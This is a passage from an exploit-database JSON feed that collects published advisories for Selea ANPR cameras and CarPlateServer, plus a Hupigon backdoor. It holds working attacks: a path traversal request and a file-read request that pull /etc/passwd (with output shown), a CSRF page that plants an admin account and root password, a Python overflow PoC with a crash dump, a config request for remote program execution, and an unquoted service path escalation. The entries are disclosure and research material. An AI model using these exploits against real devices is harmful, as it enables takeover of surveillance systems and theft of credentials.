http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd \nroot:x:0:0:root:/root:/bin/sh \ndaemon:x:1:1:daemon:/usr/sbin:/bin/false \nbin:x:2:2:bin:/bin:/bin/false \nsys:x:3:3:sys:/dev:/bin/false \nsync:x:4:100:sync:/bin:/bin/sync \nmail:x:8:8:mail:/var/spool/mail:/bin/false \nwww-data:x:33:33:www-data:/var/www:/bin/false \noperator:x:37:37:Operator:/var:/bin/false \nnobody:x:99:99:nobody:/home:/bin/false \ndbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false \n \n \n \nPOST /cgi-bin/get_file.php HTTP/1.1 \nHost: 192.168.1.17 \n \nname=TESTINGUS&files_list=/etc/passwd \n \n \nHTTP/1.1 200 OK \nContent-Type: application/octet-stream \nContent-disposition: attachment; filename=\"TESTINGUS.tar\" \nExpires: 0 \nCache-Control: must-revalidate \nPragma: public \nContent-Length: 2048 \nConnection: close \nDate: Wed, 09 Dec 2020 01:39:57 GMT \nServer: selea_httpd \n \nroot:/root:/bin/sh \ndaemon:x:1:1:daemon:/usr/sbin:/bin/false \nbin:x:2:2:bin:/bin:/bin/false \nsys:x:3:3:sys:/dev:/bin/false \nsync:x:4:100:sync:/bin:/bin/sync \nmail:x:8:8:mail:/var/spool/mail:/bin/false \nwww-data:x:33:33:www-data:/var/www:/bin/false \noperator:x:37:37:Operator:/var:/bin/false \nnobody:x:99:99:nobody:/home:/bin/false \ndbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161057/ZSL-2021-5616.txt"}, {"lastseen": "2021-01-22T15:45:56", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Selea Targa IP OCR-ANPR Camera Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161060", "href": "https://packetstormsecurity.com/files/161060/Selea-Targa-IP-OCR-ANPR-Camera-Cross-Site-Request-Forgery.html", "sourceData": "` \nSelea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit \n \n \nVendor: Selea s.r.l. \nProduct web page: https://www.selea.com \nAffected version: Model: iZero \nTarga 512 \nTarga 504 \nTarga Semplice \nTarga 704 TKM \nTarga 805 \nTarga 710 INOX \nTarga 750 \nTarga 704 ILB \nFirmware: BLD201113005214 \nBLD201106163745 \nBLD200304170901 \nBLD200304170514 \nBLD200303143345 \nBLD191118145435 \nBLD191021180140 \nBLD191021180140 \nCPS: 4.013(201105) \n3.100(200225) \n3.005(191206) \n3.005(191112) \n \nSummary: IP camera with optical character recognition (OCR) software for automatic \nnumber plate recognition (ANPR) also equipped with ADR system that enables it to read \nthe Hazard Identification Number (HIN, also known as the Kemler Code) and UN number \nof any vehicle captured in free-flow mode. TARGA is fully accurate in reading number \nplates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes \nthis camera suitable for all installation conditions. Its built-in OCR software works \nas an automatic and independent system without the need of a computer, thus giving \nautonomy to the device even in the event of an interruption in the connection between \nthe camera and the operations centre. \n \nDesc: The application interface allows users to perform certain actions via HTTP requests \nwithout performing any validity checks to verify the requests. This can be exploited to \nperform certain actions with administrative privileges if a logged-in user visits a malicious \nweb site. \n \nTested on: GNU/Linux 3.10.53 (armv7l) \nPHP/5.6.22 \nselea_httpd \nHttpServer/0.1 \nSeleaCPSHttpServer/1.1 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2021-5618 \nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php \n \n \n07.11.2020 \n \n-- \n \n \nAdd Admin: \n---------- \n \n<html> \n<body> \n<script> \nfunction submitRequest() \n{ \nvar xhr = new XMLHttpRequest(); \nxhr.open(\"POST\", \"http:\\/\\/192.168.1.17\\/save_params.php\", true); \nxhr.setRequestHeader(\"Accept\", \"*\\/*\"); \nxhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.9\"); \nxhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=cfgboundary-----------------------1607475234133\"); \nxhr.withCredentials = true; \nvar body = \"--cfgboundary-----------------------1607475234133\\r\\n\" + \n\"Content-Disposition: form-data; name=\\\"set_params\\\"\\r\\n\" + \n\"\\r\\n\" + \n\"upload\\r\\n\" + \n\"--cfgboundary-----------------------1607475234133\\r\\n\" + \n\"Content-Disposition: form-data; name=\\\"user_file\\\"; filename=\\\"set_params.dat\\\"\\r\\n\" + \n\"Content-Type: application/octet-stream\\r\\n\" + \n\"\\r\\n\" + \n\"[SECURITY.USERS]\\r\\n\" + \n\"security-users-0-username = testingus\\r\\n\" + \n\"security-users-0-password = testingus\\r\\n\" + \n\"security-users-0-rights = 2\\r\\n\" + \n\"security-users-1-username = \\r\\n\" + \n\"security-users-1-password = \\r\\n\" + \n\"security-users-1-rights = 0\\r\\n\" + \n\"security-users-2-username = \\r\\n\" + \n\"security-users-2-password = \\r\\n\" + \n\"security-users-2-rights = 0\\r\\n\" + \n\"security-users-3-username = \\r\\n\" + \n\"security-users-3-password = \\r\\n\" + \n\"security-users-3-rights = 0\\r\\n\" + \n\"security-allow_viewers_storage_access = 1\\r\\n\" + \n\"CFG_ROOTPASS = admin\\r\\n\" + \n\"\\r\\n\" + \n\"--cfgboundary-----------------------1607475234133--\\r\\n\"; \nvar aBody = new Uint8Array(body.length); \nfor (var i = 0; i < aBody.length; i++) \naBody[i] = body.charCodeAt(i); \nxhr.send(new Blob([aBody])); \n} \n</script> \n<form action=\"#\"> \n<input type=\"button\" value=\"Add Admin\" onclick=\"submitRequest();\" /> \n</form> \n</body> \n</html> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161060/ZSL-2021-5618.txt"}, {"lastseen": "2021-01-22T15:46:27", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Hupigon.adef Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161062", "href": "https://packetstormsecurity.com/files/161062/Backdoor.Win32.Hupigon.adef-Remote-Stack-Buffer-Overflow.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/c8f55ce7bbec784a97d7bfc6d7b1931f.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Hupigon.adef \nVulnerability: Remote Stack Buffer Overflow \nDescription: Backdoor Hupigon (Cracked by bartchen) bartchen@vip.sina.com, listens on TCP ports 8001,8002,8003,8004 and 8005. Sending a large contaminated HTTP POST request to the target on port 8002 results in a buffer overflow overwriting the instruction pointer (EIP). \nType: PE32 \nMD5: c8f55ce7bbec784a97d7bfc6d7b1931f \nVuln ID: MVID-2021-0045 \nDropped files: \nASLR: False \nDEP: False \nSafe SEH: True \nDisclosure: 01/21/2021 \n \nMemory Dump: \n(17a8.1448): Access violation - code c0000005 (first/second chance not available) \neax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=00000000 edi=00000000 \neip=41414141 esp=000a1660 ebp=000a1680 iopl=0 nv up ei pl zr na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 \n41414141 ?? ??? \n \n0:000> !analyze -v \n******************************************************************************* \n* * \n* Exception Analysis * \n* * \n******************************************************************************* \n \n \nFAULTING_IP: \nBackdoor_Win32_Hupigon_adef_c8f55ce7bbec784a97d7bfc6d7b1931f+16eec2 \n0056eec2 8b8010050000 mov eax,dword ptr [eax+510h] \n \nEXCEPTION_RECORD: 0019d7d4 -- (.exr 0x19d7d4) \nExceptionAddress: 0056eec2 (Backdoor_Win32_Hupigon_adef_c8f55ce7bbec784a97d7bfc6d7b1931f+0x0016eec2) \nExceptionCode: c0000005 (Access violation) \nExceptionFlags: 00000000 \nNumberParameters: 2 \nParameter[0]: 00000000 \nParameter[1]: 41414651 \nAttempt to read from address 41414651 \n \nPROCESS_NAME: Backdoor.Win32.Hupigon.adef.c8f55ce7bbec784a97d7bfc6d7b1931f.exe \n \nERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. \n \nEXCEPTION_PARAMETER1: 00000008 \n \nEXCEPTION_PARAMETER2: 41414141 \n \nWRITE_ADDRESS: 41414141 \n \nFOLLOWUP_IP: \nuser32!UserCallWinProcCheckWow+0 \n764faf87 689c000000 push 9Ch \n \nFAILED_INSTRUCTION_ADDRESS: \n+0 \n41414141 ?? ??? \n \nMOD_LIST: <ANALYSIS/> \n \nNTGLOBALFLAG: 0 \n \nAPPLICATION_VERIFIER_FLAGS: 0 \n \nIP_ON_HEAP: 41414141 \nThe fault address in not in any loaded module, please check your build's rebase \nlog at <releasedir>\\bin\\build_logs\\timebuild\\ntrebase.log for module which may \ncontain the address if it were loaded. \n \nIP_IN_FREE_BLOCK: 41414141 \n \nCONTEXT: 0019d824 -- (.cxr 0x19d824) \neax=41414141 ebx=0452c730 ecx=0019dc7c edx=00000000 esi=0046d060 edi=02850fd5 \neip=0056eec2 esp=0019dc84 ebp=0019fce8 iopl=0 nv up ei pl nz ac po nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212 \nBackdoor_Win32_Hupigon_adef_c8f55ce7bbec784a97d7bfc6d7b1931f+0x16eec2: \n0056eec2 8b8010050000 mov eax,dword ptr [eax+510h] ds:002b:41414651=???????? \nResetting default scope \n \nADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] \n \nLAST_CONTROL_TRANSFER: from 41414141 to 0056eec2 \n \nFAULTING_THREAD: ffffffff \n \nBUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 \n \nPRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 \n \nDEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 \n \nFRAME_ONE_INVALID: 1 \n \nSTACK_TEXT: \n0019dc84 0056eec2 backdoor_win32_hupigon_adef+0x16eec2 \n0019fcf0 41414141 unknown!printable+0x0 \n0019fcf4 41414141 unknown!printable+0x0 \n0019fdf4 764fb025 user32!UserCallWinProcCheckWow+0x9e \n0019fef8 004644d8 backdoor_win32_hupigon_adef+0x644d8 \n0019ff64 00573179 backdoor_win32_hupigon_adef+0x173179 \n0019ff88 76e38654 kernel32!BaseThreadInitThunk+0x24 \n0019ff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f \n0019ffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b \n \n \nSYMBOL_NAME: user32!UserCallWinProcCheckWow+0 \n \nFOLLOWUP_NAME: MachineOwner \n \nMODULE_NAME: user32 \n \nIMAGE_NAME: user32.dll \n \nDEBUG_FLR_IMAGE_TIMESTAMP: 0 \n \nSTACK_COMMAND: .cxr 000000000019D824 ; kb ; dds 19dc84 ; kb \n \nFAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_user32.dll!UserCallWinProcCheckWow \n \nBUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_user32!UserCallWinProcCheckWow+0 \n \n \n \nExploit/PoC: \nfrom socket import * \n \nMALWARE_HOST=\"x.x.x.x\" \nPORT=8002 \n \ndef doit(): \ns=socket(AF_INET, SOCK_STREAM) \ns.connect((MALWARE_HOST, PORT)) \n \nPBARBAR=\"POST /\"+\"A\"*4198+\"HTTP/1.1\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \"+\"A\"*4198 \n \ns.send(PBARBAR) \ns.close() \n \nprint(\"Backdoor.Win32.Hupigon.adef / Remote Stack Buffer Overflow\"); \nprint(\"MD5: c8f55ce7bbec784a97d7bfc6d7b1931f\"); \nprint(\"By Malvuln\"); \n \nif __name__==\"__main__\": \ndoit() \n \n \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161062/MVID-2021-0045.txt"}], "exploitdb": [{"lastseen": "2021-01-22T09:06:45", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49452", "href": "https://www.exploit-db.com/exploits/49452", "sourceData": "# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution\r\n# Date: 08.11.2020\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.selea.com\r\n\r\nSelea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution\r\n\r\n\r\nVendor: Selea s.r.l.\r\nProduct web page: https://www.selea.com\r\nAffected version: 4.0.1.6(210120)\r\n 4.013(201105)\r\n 3.100(200225)\r\n 3.005(191206)\r\n 3.005(191112)\r\n\r\nSummary: Our CPS (Car Plate Server) software is an advanced solution that can\r\nbe installed on computers and servers and used as an operations centre. It can\r\ncreate sophisticated traffic control and road safety systems connecting to\r\nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert\r\nnotifications directly to tablets or smartphones, it can receive and transfer\r\ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution\r\nthat offers full integration with main video surveillance software. Our CPS\r\nsoftware connects to the national operations centre and provides law enforcement\r\nauthorities with necessary tools to issue alerts. CPS is designed to guarantee\r\ncooperation among different law enforcement agencies. It allows to create a\r\nmulti-user environment that manages different hierarchy levels and the related\r\ndivision of competences.\r\n\r\nDesc: The server suffers from an arbitrary win32/64 binary executable execution\r\nwhen setting the NO_LIST_EXE_PATH variable to a program of choice. The command\r\nwill be executed if proper trigger criteria is met. It can be exploited via CSRF\r\nor by navigating to /cps/ endpoint from the camera IP and bypass authentication\r\ngaining the ability to modify the running configuration including changing the\r\npassword of admin and other users.\r\n\r\nTested on: Microsoft Windows 10 Enterprise\r\n SeleaCPSHttpServer/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5622\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php\r\n\r\n\r\n08.11.2020\r\n\r\n--\r\n\r\n\r\nPOST /config_request?ACTION=WRITE HTTP/1.1\r\nHost: localhost:8080\r\nConnection: keep-alive\r\nContent-Length: 6309\r\nAuthorization: Basic ZmFrZTpmYWtl\r\nAccept: application/json, text/plain, */*\r\nLoginMode: angular\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75\r\nAuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a\r\ncontent-type: application/json\r\nOrigin: http://localhost:8080\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Dest: empty\r\nReferer: http://localhost:8080/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n\r\n{\r\n \"ACTIONS\": {\r\n \"ANIA_LIST_DAYS_NUM\": \"15\",\r\n \"ANIA_LIST_PWD\": \"\",\r\n \"ANIA_LIST_USER\": \"{B64valuehereommited}\",\r\n \"BLACK_LIST_COUNTRY\": \"\",\r\n \"EXACT_MATCH\": \"false\",\r\n \"FUZZY_MATCH\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_DAYS_NUM\": \"15\",\r\n \"MINISTEROTRASPORTI_LIST_ENABLE_CHECK\": \"0,1\",\r\n \"MINISTEROTRASPORTI_LIST_GET_OWNERS\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_PWD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USER\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER\": \"false\",\r\n \"MINISTEROTRASPORTI_LIST_USE_VPN\": \"true\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_PASSWORD\": \"\",\r\n \"MINISTEROTRASPORTI_LIST_VPN_USERNAME\": \"\",\r\n \"MINISTERO_LIST_DAYS_NUM\": \"24\",\r\n \"MINISTERO_LIST_PWD\": \"\",\r\n \"MINISTERO_LIST_USER\": \"\",\r\n \"NO_LIST_ENABLED\": \"true\",\r\n \"NO_LIST_ENABLE_EXE\": \"true\",\r\n \"NO_LIST_EXE_PATH\": \"C:/windows/system32/calc.exe\",\r\n \"NO_LIST_HTTP\": \"http://localhost:8080/$TRIGGER_EXE_VAR\",\r\n \"NO_LIST_HTTP_ENABLED\": \"false\",\r\n \"NO_LIST_SEND_TCP_ALARM\": \"\",\r\n \"PERMISSIVE_MATCH\": \"true\",\r\n \"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO\": \"\"\r\n },\r\n \"CAMERAINFO\": {\r\n \"BA__________\": {\r\n \"APPROACHING\": \"\",\r\n \"CustomCameraId\": \"\",\r\n \"CustomGateId\": \"\",\r\n \"DetectDesc\": \"ZSL\",\r\n \"DetectId\": \"\",\r\n \"Direction\": \"\",\r\n \"GPSLocation\": \"\",\r\n \"GateDesc\": \"3\",\r\n \"GateId\": \"\",\r\n \"LEAVING\": \"\",\r\n \"ZoneName\": \"\",\r\n \"setname\": \"false\",\r\n \"skip\": \"false\"\r\n }\r\n },\r\n \"CONTEXT\": {\r\n \"BA__________\": {\r\n \"URL\": [\r\n \"https://www.zeroscience.mk\"\r\n ]\r\n }\r\n },\r\n \"DBMS\": {\r\n \"DB_NAME\": \"\",\r\n \"DB_PASSWORD\": \"\",\r\n \"DB_SERVER\": \"\",\r\n \"DB_TYPE\": \"sqlite\",\r\n \"DB_USERNAME\": \"\",\r\n \"ENCRYPT_DB\": \"false\",\r\n \"SQLITE_MAX_MB_RAM_CACHE\": \"-1\"\r\n },\r\n \"EMAIL\": {\r\n \"DEST\": \"\",\r\n \"FROM_EMAIL\": \"\",\r\n \"FROM_NAME\": \"\",\r\n \"LOG_USER_SEARCH\": \"false\",\r\n \"MIN_EMAIL_TIME\": \"5\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"25\",\r\n \"SEND_EMAIL_ON_TAMPER\": \"false\",\r\n \"SERVER\": \"\",\r\n \"SSL\": \"false\",\r\n \"USERNAME\": \"\",\r\n \"XOAUTH2\": \"false\"\r\n },\r\n \"EMAIL-XOAUTH2\": {\r\n \"refresh_token\": \"\"\r\n },\r\n \"EZ_CLIENTS\": {\r\n \"PASSWORD\": \"\",\r\n \"SLAVES\": \"\",\r\n \"USERNAME\": \"\",\r\n \"USE_CNTLM\": \"false\",\r\n \"WANT_CTX\": \"false\"\r\n },\r\n \"EZ_CLIENT_SCNTT\": {\r\n \"CTX\": \"true\",\r\n \"HOST\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"443\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"FTPSYNC\": {\r\n \"DELETE_OLD_SYNC_DAYS\": \"7\",\r\n \"JSON_CONFIG\": \"eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==\",\r\n \"SAVE_FTP_SEND_ERRORS\": \"true\"\r\n },\r\n \"GLOBAL_HTTP_PROXY\": {\r\n \"CNTLM_ENABLED\": \"false\",\r\n \"EZ_ADDRESS\": \"cps.selea.com\",\r\n \"EZ_PORT\": \"8999\",\r\n \"HOST\": \"\",\r\n \"NON_PROXY_HOST\": \"localhost|^(10|127|169\\\\.254|172\\\\.1[6-9]|172\\\\.2[0-9]|172\\\\.3[0-1]|192\\\\.168)\\\\..+\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"PROXY_ENABLED\": \"true\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"HTTPS\": {\r\n \"CERTIFICATE\": \"\",\r\n \"ENABLE_HTTP2\": \"true\",\r\n \"GET_CERTIFICATE_FROM_SELEA\": \"false\",\r\n \"PRIVATE_KEY\": \"\",\r\n \"ROOT_CERTIFICATE\": \"\"\r\n },\r\n \"MASTER_CPS\": {\r\n \"ENABLED\": \"true\",\r\n \"MASTERS\": \"\",\r\n \"PASSWORD\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"PROXY_TCP\": {\r\n \"ENABLED\": \"false\",\r\n \"USE_HTTP_PROXY\": \"false\"\r\n },\r\n \"REMOTE_LIST\": {\r\n \"ADDRESS\": \"\",\r\n \"ENABLED\": \"false\",\r\n \"PASSWORD\": \"\",\r\n \"PORT\": \"\",\r\n \"USERNAME\": \"\"\r\n },\r\n \"REPORT\": {\r\n \"STATS_AGGREGATE\": \"true\",\r\n \"STATS_ENABLED\": \"false\",\r\n \"STATS_FREQ\": \"MONTH\",\r\n \"STATS_PATH\": \"\",\r\n \"STATS_SELECTED\": \"\",\r\n \"STATS_WEEK_DAY\": \"Mon\"\r\n },\r\n \"SCNTT\": {\r\n \"LIST_A1_DAYS_LIMIT\": \"0\",\r\n \"SCNTT_PASSWORD\": \"\",\r\n \"SCNTT_PRIV_KEY_FILENAME\": \"\",\r\n \"SCNTT_PUB_CERT\": \"\",\r\n \"SCNTT_SYSTEM_DESC\": \"\",\r\n \"SCNTT_SYSTEM_ID\": \"\",\r\n \"SCNTT_USERNAME\": \"\"\r\n },\r\n \"SETTINGS\": {\r\n \"ALLOW_FLASH_NOTIFICATIONS\": \"true\",\r\n \"AUTO_UPDATE\": \"true\",\r\n \"BACKUP_AT_SPECIFIC_HOUR\": \"-1\",\r\n \"BACKUP_DB_PATH\": \"\",\r\n \"BACKUP_EVERY_HOURS\": \"0\",\r\n \"CARPLATE_DETAILS_ENABLED\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES\": \"false\",\r\n \"CHECK_EXPIRING_CARPLATES_DAYS\": \"7\",\r\n \"CHECK_FILENAME_SYNTAX\": \"true\",\r\n \"DB_DELETE_DAYS\": \"90\",\r\n \"DB_DELETE_ENABLE\": \"false\",\r\n \"DB_DELETE_LOG_DAYS\": \"7\",\r\n \"DB_DELETE_OCR_FILE\": \"90\",\r\n \"DB_STATS_DELETE_DAYS\": \"90\",\r\n \"DISABLE_WHITELIST_REMOTE_DB_CHECK\": \"false\",\r\n \"ENCRYPT_IMAGES\": \"false\",\r\n \"FREE_DISK_LIMIT\": \"1000\",\r\n \"FRIENDLY_NAME\": \"test\",\r\n \"FTP_CUSTOM_PORT_RANGE\": \"false\",\r\n \"FTP_DOWNLOAD_DISABLED\": \"true\",\r\n \"FTP_ENABLED\": \"true\",\r\n \"FTP_EXTERN_IP\": \"\",\r\n \"FTP_EXTERN_IP_AUTO\": \"false\",\r\n \"FTP_LIST_DIR_DISABLED\": \"true\",\r\n \"FTP_MAX_PORT\": \"0\",\r\n \"FTP_MIN_PORT\": \"0\",\r\n \"FTP_PORT\": \"21\",\r\n \"FTP_USERS\": \"\",\r\n \"FTP_USE_FTPS\": \"true\",\r\n \"HTTP2_PORT\": \"8081\",\r\n \"HTTP_PASSWORD\": \"CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU\",\r\n \"HTTP_PORT\": \"8080\",\r\n \"HTTP_USERNAME\": \"admin\",\r\n \"IGNORE_CONTEXT_FOR_UNREADFAKE\": \"false\",\r\n \"IGNORE_IF_NOT_SYNTAX_MATCH\": \"false\",\r\n \"MILESTONE_CONNECTIONS\": \"5\",\r\n \"MILESTONE_ENABLED\": \"true\",\r\n \"MILESTONE_ENABLE_ACTIVE_CONNECTION\": \"false\",\r\n \"MILESTONE_PORT\": \"5666\",\r\n \"MILESTON_REMOTE_IP\": \"\",\r\n \"MILESTON_REMOTE_PORT\": \"8080\",\r\n \"MIN_LOG_LEVEL\": \"0\",\r\n \"PERIODIC_BACKUP_CONFIG\": \"0\",\r\n \"REMOVE_BLACK_LIST_ON_EXPIRE\": \"true\",\r\n \"REMOVE_NON_ALARM_CARPLATE\": \"false\",\r\n \"REMOVE_WHITE_LIST_ON_EXPIRE\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS\": \"true\",\r\n \"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS\": \"7\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION\": \"false\",\r\n \"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME\": \"600\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ\": \"false\",\r\n \"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME\": \"12\",\r\n \"SERVER_NTP_ON\": \"false\",\r\n \"SERVER_NTP_PORT\": \"123\",\r\n \"USE_HTTPS\": \"false\"\r\n },\r\n \"VPNC\": {\r\n \"VPN_NET_NAME\": \"\"\r\n },\r\n \"TCP_TEMPLATES\": []\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49452"}, {"lastseen": "2021-01-22T09:06:44", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49453", "href": "https://www.exploit-db.com/exploits/49453", "sourceData": "# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation\r\n# Date: 08.11.2020\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.selea.com\r\n\r\nSelea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation\r\n\r\n\r\nVendor: Selea s.r.l.\r\nProduct web page: https://www.selea.com\r\nAffected version: 4.0.1.6(210120)\r\n 4.013(201105)\r\n 3.100(200225)\r\n 3.005(191206)\r\n 3.005(191112)\r\n\r\nSummary: Our CPS (Car Plate Server) software is an advanced solution that can\r\nbe installed on computers and servers and used as an operations centre. It can\r\ncreate sophisticated traffic control and road safety systems connecting to\r\nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert\r\nnotifications directly to tablets or smartphones, it can receive and transfer\r\ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution\r\nthat offers full integration with main video surveillance software. Our CPS\r\nsoftware connects to the national operations centre and provides law enforcement\r\nauthorities with necessary tools to issue alerts. CPS is designed to guarantee\r\ncooperation among different law enforcement agencies. It allows to create a\r\nmulti-user environment that manages different hierarchy levels and the related\r\ndivision of competences.\r\n\r\nDesc: The application suffers from an unquoted search path issue impacting the\r\nservice 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software\r\napplication. This could potentially allow an authorized but non-privileged local\r\nuser to execute arbitrary code with elevated privileges on the system. A successful\r\nattempt would require the local user to be able to insert their code in the system\r\nroot path undetected by the OS or other security applications where it could\r\npotentially be executed during application startup or reboot. If successful, the\r\nlocal user's code would execute with the elevated privileges of the application.\r\n\r\nTested on: Microsoft Windows 10 Enterprise\r\n SeleaCPSHttpServer/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5621\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php\r\n\r\n\r\n08.11.2020\r\n\r\n--\r\n\r\n\r\nC:\\Users\\Smurf>sc qc \"Selea CarPlateServer\"\r\n[SC] QueryServiceConfig SUCCESS\r\n\r\nSERVICE_NAME: Selea CarPlateServer\r\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Selea CarPlateServer\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\r\n\r\nC:\\Users\\Smurf>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49453"}, {"lastseen": "2021-01-22T13:11:44", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - SSTI", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": 